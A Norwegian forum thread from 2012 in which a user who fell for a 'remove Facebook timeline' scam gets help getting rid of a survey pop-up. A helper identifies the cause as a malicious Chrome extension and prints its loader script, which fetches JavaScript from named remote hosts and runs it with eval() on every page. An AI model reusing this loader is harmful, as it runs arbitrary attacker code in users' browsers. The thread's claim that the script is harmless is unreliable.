Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  24 2400
#Offisielt Trønder
Hei ! Jeg finner ingen løsning på dette problemet så jeg prøver her:
Jeg fikk en invitasjon til "REMOVE TIMELIME FROM FACEBOOK" av en god venn så jeg tenkte han hadde funnet en måte så trykte jeg på linken som begynte på bit.ly/Sier-ikke-hele
Så sa jeg ja osv. men i ettertid så får jeg en poop-up HVERGANG jeg er innpå ei facebook side "Verify your account"
og da må jeg ta en brukerundersøkelse å skrive inn tlf og en kode du får på tlf. Jeg har prøvd og gått på Applikasjoner og den står ikke der.. Har også prøv www.facebook.com/hacked <-- men det er bare for å skifte passord men det funker heller ikke pga. jeg får pop-up med "verify your account" hvergang jeg skal gjøre noe.


Jeg tror jeg sender ut jeg også nå siden jeg fikk dette selv

Tips?

Ser ut som det er flere som lurer også
Jeg lurer på når det blir obligatorisk internettopplæring i grunnskolen.
I failed unit tests
Freddy_fred5's Avatar
Sitat av snuskatten Vis innlegg
Jeg lurer på når det blir obligatorisk internettopplæring i grunnskolen.
Vis hele sitatet...
Enig, meget, meget, enig
#Offisielt Trønder
Trådstarter
Joda. Jeg vet at jeg var dum men hadde du mistenkt en venn da? + at det lå på Facebook siden
Sitat av simonpro Vis innlegg
Joda. Jeg vet at jeg var dum men hadde du mistenkt en venn da? + at det lå på Facebook siden
Vis hele sitatet...
Ja. [COLOR="White"]titegn.[/COLOR]
Sist endret av Poison; 10. april 2012 kl. 16:22.
#Offisielt Trønder
Trådstarter
Spurte ikke om tips for å forebygge dette. Jeg spurte om noen var så snill å kunnet hjelpe meg ut.


Blir ikke bedre om jeg får vite hvor dum jeg har vært. Gjort er gjort
slå av javascript - endre passord?
#Offisielt Trønder
Trådstarter
Sitat av Magnisx Vis innlegg
slå av javascript - endre passord?
Vis hele sitatet...
Du må ha javascript for å bruke Facebook Endre passord får jeg ikke til fordi pop-upen kommer

Takk for svar!
Du sier du må ta en brukerundersøkelse, hvordan ser denne ut? Kan du forklare litt nærmere, gjerne med bilder?
Er det Facebooks egen telefon verifisering (får kode på SMS hver gang du logger inn på ny enhet) som kommer opp? Får du opp samme meldingene i en annen nettleser? Har du inntrykk av at denne infeksjonen ligger på din maskin eller kun i Facebook?

Kan du sende meg full link til den siden på PM? Kan prøve å sjekke det ut i et testmiljø.
#Offisielt Trønder
Trådstarter
Sendte deg en PM nå


Du må ta sånn Vinn en Iphone undersøkelse også skrive inn tlf. Iføle Dagbladet skulle det tappe deg for penger ..
Du vant ikke tilfeldigvis en iPad 5G fordi du var besøkende nummer 999,999,999 når du surfet voksenfilmer i går kveld også? [COLOR="White"](275,5kr/uke trekkes fra din mobilregning)[/COLOR]
Du sier du får den popup-en hver gang du skal gjøre noe, vil det si at den hindrer deg i å gjøre noe?
F.eks når du vil endre passord, lukker den siden hvor du endrer passord og åpner den popupen?

Dersom popup-vinduet er integrert i Facebook, forsøk med en annen nettleser og på en annen maskin.

TS får ikke tak i bit.ly-lenken, er det noen andre som har hele lenken?
#Offisielt Trønder
Trådstarter
Den kommer opp på hver side på Facebook domenet
developers.facebook.com se om du finner noe der om applikasjoner?
#Offisielt Trønder
Trådstarter
Får ikke til og se stort. Må logge inn for å gjøre det
Just for fun and games, har du prøvd en annen nettleser?

Og; hvilken nettleser bruker du atm?
#Offisielt Trønder
Trådstarter
Google Chrome bruker jeg

Testet ut : Safari og Mozilla og da funket det ^^ Tusen takk ! *facepalm* at jeg ikke tenkte og prøve det x) Noen som har funnet løsning for og bruke Google Chrome da? :O Har jo ihvertfall tilgang til Facebook nå da x)
Det enkle er ofte the beste, no? -.^
Apple Product tester
10 1
Har du prøvd å slette Chrome å laste det ned på nytt?
TS, får du tak i bit.ly adressen nå? Vil gjerne sjekke ut denne
#Offisielt Trønder
Trådstarter
Sitat av Diox Vis innlegg
TS, får du tak i bit.ly adressen nå? Vil gjerne sjekke ut denne
Vis hele sitatet...
Sender det nå på PM
Da kan du jo sjekke om det ligger noe funky her; chrome://settings/extensions
Til informasjon så er dette "viruset" TS har fått kun ment for Chrome-brukere, og er en plugin som er gitt navnet Youtube Video Plugin 11.10.

Dette får du KUN om du selv godtar å installere en plugin, som vistnok skal fjerne timeline på Facebook.

Chrome pluginen gjør ikke annet enn å laste følgende script på alle http(s) forespørsler i nettleseren:

Kode

randnw = Math.round(new Date().getTime() / 1000);
if (document.location.protocol == "https:") {
	pagesload='https://ns105.mochahost.com/~filipcek/ch.js?v='+randnw;	
}
else
{
	pagesload='http://seriesland.net/ch.js?v='+randnw;
}
var req = new XMLHttpRequest();
req.open('GET', pagesload, false); 
req.send();
var contents = req.responseText;
eval(contents);
I utgangspunktet er dette helt ufarlig, bare irriterende. Pluginen kan som pinkrabbitz nevner, fjernes fra listen over installerte extensions i Chrome (chrome://settings/extensions) uten problemer.

Kan også nevne at det nå ser ut som at seriesland.net har blitt oppdaget og tatt ned, får bare en 403 melding når jeg besøker siden.

Har ikke fått testet hva dette faktisk gjør med Facebook kontoen din, og får heller ikke testet dette da jeg får 403 på siden.
Sist endret av Diox; 11. april 2012 kl. 11:35.
Sitat av Diox Vis innlegg
Til informasjon så er dette "viruset" TS har fått kun ment for Chrome-brukere, og er en plugin som er gitt navnet Youtube Video Plugin 11.10.

Dette får du KUN om du selv godtar å installere en plugin, som vistnok skal fjerne timeline på Facebook.

Chrome pluginen gjør ikke annet enn å laste følgende script på alle http(s) forespørsler i nettleseren:

I utgangspunktet er dette helt ufarlig, bare irriterende. Pluginen kan som pinkrabbitz nevner, fjernes fra listen over installerte extensions i Chrome (chrome://settings/extensions) uten problemer.

Kan også nevne at det nå ser ut som at seriesland.net har blitt oppdaget og tatt ned, får bare en 403 melding når jeg besøker siden.

Har ikke fått testet hva dette faktisk gjør med Facebook kontoen din, og får heller ikke testet dette da jeg får 403 på siden.
Vis hele sitatet...
Tenkte meg det var noe slikt ja.
#Offisielt Trønder
Trådstarter
Takk til deg Diox !